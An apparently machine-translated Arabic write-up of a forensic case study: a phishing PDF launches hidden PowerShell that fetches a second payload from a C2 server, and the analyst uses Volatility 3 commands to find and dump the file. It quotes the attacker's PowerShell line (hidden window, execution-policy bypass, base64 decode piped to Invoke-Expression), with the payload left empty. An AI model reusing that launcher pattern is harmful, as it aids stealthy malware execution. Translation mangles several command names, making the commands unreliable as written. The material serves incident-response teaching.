لقد قمنا بتغطية دراسة حالة للاستجابة للحوادث السيبرانية والتي تضمنت برنامجًا ضارًا لملفات PDF تم تسليمه عبر بريد إلكتروني تصيّدي. بمجرد فتح برنامج PDF الضار، تم إنشاء جلسة powershell في نافذة مخفية تنفذ أمرًا مشفرًا بـ base64 لاسترداد ملف ضار آخر من خادم C2. لقد استخرجنا العينة باستخدام المكونات الإضافية Volatility ثم قمنا بتحميل العينة عليها فايروس توتال و Any.run لتحليل البرامج الضارة ديناميكيًا واستخراج العناصر ذات الصلة.
يسلط الضوء
اكتساب الذاكرة
يمكن إجراء استخراج ملف تفريغ الذاكرة بعدة طرق، تختلف بناءً على متطلبات التحقيق الخاص بك. فيما يلي قائمة ببعض التقنيات والأدوات التي يمكن استخدامها لاستخراج الذاكرة من آلة معدنية.
FTK تصوير Redline DumpIt.exe win32dd.exe / win64dd.exe Memoryze FastDump dd
ما هو التقلب
يعد التقلب هو الإطار الأكثر استخدامًا في العالم لاستخراج القطع الأثرية الرقمية من عينات الذاكرة المتطايرة (RAM). يتم تنفيذ تقنيات الاستخراج بشكل مستقل تمامًا عن النظام الذي يتم فحصه ولكنه يوفر رؤية لحالة وقت تشغيل النظام
التقلب 2 مقابل التقلب 3
اعتمادًا على الإصدار المثبت من Volatility، قد يختلف بناء جملة الأمر. على سبيل المثال، في Volatility 2، يمكننا استخدام المكون الإضافي مباشرة باستخدام اسمه مثل إدراج العمليات مع قائمة البرنامج المساعد pslist، ولكن في Volatility 3 يتعين علينا كتابة اسم نظام التشغيل باستخدام المكون الإضافي بامتداد . الفصل بينهما. بالعودة إلى مثال قائمة العمليات، في Volatility 3، نكتب windows.pslist لاستخدام المكون الإضافي
هناك اختلاف آخر عند تحديد معلومات الصورة. في Volatility 2 يمكننا استخدامها مباشرة معلومات الصورة
لتحديد نظام التشغيل واللاحق الذي نستخدمه --الملف الشخصي osname
في الأوامر اللاحقة ولكن في Volatility 3 نستخدم إما Windos.info
أو linux.info
لتحديد تفاصيل حول نظام التشغيل ولا نحتاج إلى ذكر أو كتابة الملف التعريفي للأوامر اللاحقة.
الأوامر المنفذة في التقلب
سرد العمليات
التقلب -f case54.raw windows.pslist
سرد الملفات في نظام التشغيل
التقلب -f case54.raw windows.filescan
استخراج البرمجيات الخبيثة PDF
التقلب -f case54.raw windows.filescan | grep -i .pdf
إلقاء ملف PDF على الجهاز المحلي
التقلب -f case54.raw -o /output/ windows.dumpfiles --physaddr
أمر powershell الذي تم تنفيذه بواسطة برنامج PDF الضار:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -فوز مخفي -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('')); إكس $r؛
تجول الفيديو | تحليل كامل مع Any.Run